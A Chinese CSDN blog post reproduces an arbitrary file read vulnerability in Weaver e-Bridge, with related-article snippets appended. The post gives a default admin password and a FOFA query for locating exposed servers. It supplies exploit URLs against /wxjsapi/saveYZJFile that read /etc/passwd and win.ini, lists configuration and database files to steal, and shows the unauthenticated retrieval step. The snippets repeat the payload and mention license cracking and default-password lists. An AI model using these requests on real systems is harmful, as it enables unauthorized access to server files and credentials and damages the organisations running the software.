泛微云桥e-Bridge任意文件读取

最新推荐文章于 2024-04-14 14:26:47 发布
最新推荐文章于 2024-04-14 14:26:47 发布
阅读量3.6k 收藏 1
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44146996/article/details/110290574
版权

泛微云桥e-Bridge任意文件读取漏洞

0x00漏洞影响版本:
该漏洞几乎影响2018-2019全版本。
0x01漏洞利用:
默认密码sysadmin/1
fofa搜索语句:title=“泛微云桥”
在这里插入图片描述
在这里插入图片描述
主要成因
/wxjsapi/saveYZJFil接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以下载相关敏感文件
构造如下语句

http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt

相关敏感文件目录

windows: d://ebridge
linux:/usr/ebridge
etc/passwd
c://windows/win.ini
d://ebridge/tomcat/conf/server.xml
d://ebridge/mysql/my.ini d://ebridge/tomcat/webapps/ROOT/WEB-INF/classes/init.properties

获取id值
在这里插入图片描述
在这里插入图片描述

通过id值获取文件内容

http://x.x.x.x/file/fileNoLogin/cf1b577f21ad41199b82d983c89bfd05

在这里插入图片描述
在这里插入图片描述

MD@@nr丫卡uer
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
微云 e-Bridge 任意文件读取.md
04-11
微云 e-Bridge 任意文件读取
微云e-Bridge 授权破解方法
weixin_34025051的博客
03-15 3967
微云e-Bridge 授权破解方法,无需更改原有程序,本方法是生成授权文件方式。 已放出授权文件生成源码,破解方法自行看源码理解,再次提示此方法仅用来测试系统使用,如需正式使用请购买正版授权。 其中使用的加密有:MD5,RSA,DES,BASE64。 1 package com.exec; 2 3 import java.io.FileOu...
四千多个厂商默认帐号、默认密码
热门推荐
程序IT圈
06-29 1万+
设备默认账号默认密码致远OAsangforadmin1audit-admingroup-adminsystem123456123456123456微OAsysadmin1MiniominioadminMinioadmin海康威视Admin12345.天地伟业Admin111111火力牛密码空网视无忧admin123456镭威视Admin用户设置沃视达admin密码空普天视admin12345蓝狼...
微最新漏洞汇总----实时更新!!!_微漏洞(1),腾讯大牛教你自己写网络安全框架
最新发布
2401_83974087的博客
04-14 345
app.name=“微 e-cology 9.0 OA”
微OA系统E-office11中小企业全能OA办公系统默认的初始密码是什么
12-17 6137
微OA系统E-office11中小企业全能OA办公系统 的相关密码
微OA E9之IDEA环境搭建
weixin_51472024的博客
12-14 1720
初始化成功之后默认的登录账号密码是sysadmin和Weaver@2001。其中需要修改的地方有。
微 E Bridge 云任意文件读取
nnn2188185的博客
03-25 1145
微云存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
微云e-Bridge安装手册
04-10
微云e-Bridge)是上海微公司在”互联网+”的背景下研发的一款用于接互联网开放资源与企业信息化系统的系统集成中间件。截止自本手册编制之日e-Bridge已实现了腾讯微信及阿里钉钉开放接口的封装,企业可以...
微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
微e-office短信插件_微短信接口开发_e-office短信发送设置
02-11
微e-office短信插件设置指南 在微e-office V10.0版本中,设置短信发送功能需要通过微短信接口进行开发。下面将详细介绍微e-office短信插件的设置步骤和微短信接口的开发过程。 一、微e-office短信插件...
微e-officev10.0_20220809标准补丁(适用于v10.0_20180119及以上版本)
08-26
版本: 10.0_20220809 发布日期: 2022-08-10 适合升级版本: 10.0_20180119版 说明: 补丁包是累计的,故20220809版本包含历史补丁包内容。 安装注意事项 *************必须执行备份后才允许安装补丁*************...
[HW必备]|蓝队防守必须排查的57个安全漏洞与解决方案
03-18 5113
一、OA系统 二、E-mail 三、Web中间件 四、源代码管理 五、项目管理系统 六、开源运维监控 七、堡垒机
微云e-Bridge-任意文件读取漏洞
chaojixiaojingang
10-09 6361
1.资产查找 Fofa: title="微云 e-Bridge" 2.漏洞描述 微云e-Bridge存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。 3.漏洞复现 1)Linux服务器 (1)在URL后添加payload payload:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt (2)在URL后添加/file/fileNo
配置文件读取绝对路径_微ebridge任意文件读取(实战trick)
weixin_42502643的博客
01-20 1888
漏洞简介 未授权任意文件读取,/wxjsapi/saveYZJFile接口获取filepath,输入文件路径->读取文件内容。返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件。 目录遍历+文件读取,我们能做的事情就很多了,比如读取管理员在桌面留下的密码文件、数据库配置文件、nginx代理配置、访问日志等。...
常见web系统默认口令总结
5L2g556F5ZWl77yf
12-14 6197
前言 在渗透测试过程中,最常见的情况就是遇到弱口令得到入口从而攻陷整个系统,由于很多系统管理员缺少安全意识,口令往往是系统默认设置的口令。本文总结了常见的系统默认口令以及默认口令在线查询网站,修补自身安全设备隐患 OA 致远OA system用户(默认密码:system,对应A8的系统管理员、A6的单位管理员) group-admin(默认密码:123456,对应A8集团版的集团管理员) admin1(默认密码:123456,对应A8企业版的单位管理员) audit-admin(默认密码:1
e-Bridge未授权文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
03-05 7434
简介 微云 e-Bridge 存在未经授权读取任意文件漏洞,可利用该漏洞,实现任意文件读取,获取敏感信息。 fofa title="微云e-Bridge" 漏洞复现 因为不是在本地搭建的漏洞复现环境,利用空间搜索引擎只找到很少量存在漏洞的网站,大多数都开启了身份验证,找到的也都是基于Windows的,所以就不在介绍Linux上搭建的了。 payload1 /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///
微-SptmForPortalThumbnail-任意文件读取漏洞-day漏洞复现(未公开)
weixin_43167326的博客
01-20 516
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!是一款全面的企业协同办公平台,提供了丰富的功能模块,包括流程管理、文档管理、协作办公、移动办公等。它可以帮助企业实现信息共享、团队协作和业务流程的数字化转型,提高工作效率和合作效能。
2020HW期间0day快报集合[ 每日更新 ]
z1feiyu
09-15 1728
目录 0x01 天融信TopApp-LB 负载均衡系统sql注入 0x02 用友GRP-u8 注入 0x03 绿盟UTS综合威胁探针管理员任意登录 0x04 齐治堡垒机前台远程命令执行漏洞(无需登录) 0x05 微OA云任意文件读取漏洞 0x06 Exchange Server 远程代码执行漏洞(POC未验证) 0x07 联软科技产品【准入】存在任意文件上传和命令执行漏洞 0x08 通达0A v11.7 后台SQL注入导致RCE 0x09 天融信数据防泄漏系统越权修改管理员密码 目前
微 e-cology9 filedownload.jsp 任意文件读取
11-24
微 e-cology9 是一款企业级办公自动化软件,然而它的 filedownload.jsp 存在任意文件读取漏洞。攻击者可以通过构造恶意的请求,访问该漏洞并读取系统中的任意文件,包括敏感信息如用户凭证、配置文件和数据库等数据。这种漏洞可能对企业的数据安全造成严重威胁,因此需要尽快得到修复。 修复这个漏洞的方法之一是及时升级软件版本,确保安装了最新的补丁程序。此外,也可以通过屏蔽 filedownload.jsp 文件或者限制其访问权限的方法来暂时防范该漏洞。另外,加强网络安全防护,限制外部访问和加密重要数据,也是保护系统安全的有效手段。同时,企业也应该加强对于软件漏洞的监测和应急处理能力,及时发现和处理类似问题,减少潜在的安全隐患。 总的来说,微 e-cology9 的 filedownload.jsp 任意文件读取漏洞可能对企业的数据和信息安全造成严重威胁,需要引起重视并及时采取措施加以修复和预防。企业需要全面加强系统的安全防护能力,加强漏洞管理和修复工作,以确保企业信息系统的安全稳定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值